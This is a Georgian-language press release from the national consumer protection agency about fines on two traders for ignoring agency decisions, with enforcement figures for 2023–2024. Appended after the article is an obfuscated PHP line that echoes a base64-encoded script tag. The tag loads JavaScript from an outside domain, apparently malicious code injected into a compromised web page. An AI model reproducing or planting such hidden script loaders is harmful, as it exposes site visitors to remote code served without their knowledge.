celsiusi
ავერსი შნაიდერი

 საქართველოს კონკურენციისა და მომხმარებლის დაცვის სააგენტოს მიერ დაკისრებული ვალდებულებების შეუსრულებლობის გამო, 2024 წლის მაისის თვეში, ორ  მოვაჭრეს ჯარიმა დაეკისრა.

საკითხი ეხება – „მომხმარებლის უფლებების დაცვის შესახებ“ საქართველოს კანონის დარღვევის ფაქტს, რომლის საფუძველზეც, სააგენტოს გადაწყვეტილების შესაბამისად, მოვაჭრეებს ევალებოდათ – თავისი სავაჭრო პოლიტიკის კანონის შესაბამისი მუხლების მოთხოვნებთან შესაბამისობაში მოყვანა.

კერძოდ, სააგენტოს მიერ წარმოებული მონიტორინგის შედეგად დადგინდა, რომ უწყების მიერ მიღებული გადაწყვეტილება არ შესრულდა. შესაბამისად, შპს “იმ ჯგუფს“ – 600 ლარი, ხოლო შპს „გრანდ ლაითს“ – 5603, 12 ლარის ოდენობით ჯარიმა დაეკისრათ.

სააგენტო განმარტავს, რომ ჯარიმის დაკისრება მოვაჭრეს სააგენტოს გადაწყვეტილების შესრულების ვალდებულებისგან არ ათავისუფლებს. ასევე, დაჯარიმების პროცედურას უწყება ახორციელებს მას შემდეგ, რაც დარღვევის დადასტურების შემდეგ, კომპანია მომხმარებლის უფლებების დაცვის მიმართულებით გაცემულ ვალდებულებებს არ შეასრულებს.

ინფორმაციისთვის, დარღვევის დადასტურების შემთხვევაში, სააგენტოს გადაწყვეტილების დადგენილ ვადაში შეუსრულებლობის ან არაჯეროვნად შესრულების შემთხვევაში, მოვაჭრეს ეკისრება ჯარიმა. ჯარიმის ოდენობა არ უნდა აღემატებოდეს მოვაჭრის წინა ფინანსური წლის წლიური ბრუნვის 2%-ს. ამასთანავე, იგი 600 ლარზე ნაკლები არ უნდა იყოს. 12 თვის განმავლობაში მოვაჭრის მიერ დარღვევის გამეორება გამოიწვევს დაკისრებული ჯარიმის გაორმაგებას.

2023 წლიდან დღემდე, სააგენტოს მიერ დაკისრებული ვალდებულების შეუსრულებლობის გამო, 34 მოვაჭრე დაჯარიმდა, ჯამში, 38 000 ლარამდე. მომხმარებლის სასარგებლოდ, ანაზღაურდა, დაახლოებით, 500 000 ლარამდე.

2024 წლის იანვარი-აპრილის თვის მონაცემებით, მომხმარებელთა ჯგუფის უფლების 18 დარღვევის ფაქტი დადასტურდა. მომხმარებლის სასარგებლოდ, პირობითი ვალდებულების აღების შესახებ 50 საქმეზე – 46 შეთანხმება გაფორმდა.

ინფორმაციას საქართველოს კონკურენციისა და მომხმარებლის დაცვის სააგენტოს პრესსამსახური ავრცელებს. 

148
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");